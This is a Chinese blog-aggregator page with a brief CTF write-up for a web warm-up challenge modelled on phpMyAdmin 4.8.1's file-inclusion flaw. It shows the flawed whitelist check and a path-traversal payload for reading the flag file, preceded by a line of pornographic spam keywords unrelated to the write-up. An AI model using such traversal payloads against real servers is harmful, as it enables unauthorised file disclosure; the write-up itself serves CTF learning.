亚洲中字慕日产2020,大陆极品少妇内射AAAAAA,无码av大香线蕉伊人久久,久久精品国产亚洲av麻豆网站

資訊專欄INFORMATION COLUMN

BCNSCTF writeup

hufeng / 545人閱讀

摘要:這個題目原型是的任意文件包含漏洞發(fā)現(xiàn)源碼不為空是字符串上面定義的方法返回值為真

[toc]

Web warm up

這個題目原型是phpmyadmin4.8.1的任意文件包含漏洞
發(fā)現(xiàn)源碼

 "source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can"t see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . "?", "?")
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . "?", "?")
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can"t see it";
            return false;
        }
    }

    if (! empty($_REQUEST["file"]) 不為空
        && is_string($_REQUEST["file"]) 是字符串
        && emmm::checkFile($_REQUEST["file"]) 上面定義的checkfile方法返回值為真
    ) {
        include $_REQUEST["file"];
        exit;
    } else {
        echo "
"; } ?>

payloadhint.php?/../../../../../ffffllllaaaagggg

文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請注明本文地址:http://www.ezyhdfw.cn/yun/31727.html

相關(guān)文章

  • WriteUp – 2018年“華為杯”極客出發(fā)XMan冬令營線上CTF選拔賽

    摘要:第二題返老還童拿到之后丟進(jìn),發(fā)現(xiàn)只有,代碼,沒有。仔細(xì)觀察發(fā)現(xiàn),以上坐標(biāo)可以對應(yīng)坐標(biāo)系中的一個九宮格。有點腦洞,把九個坐標(biāo)編好數(shù)字,然后按照坐標(biāo)給出的順序?qū)憯?shù)字就是答案。 Mobile 第二題:返老還童(1000pt) 拿到apk之后丟進(jìn)JEB,發(fā)現(xiàn)只有.class,java代碼,沒有so。整個apk的class文件結(jié)構(gòu)如下: a.a.a com.reverse.daydayup.a ...

    young.li 評論0 收藏0

發(fā)表評論

0條評論

最新活動
閱讀需要支付1元查看
<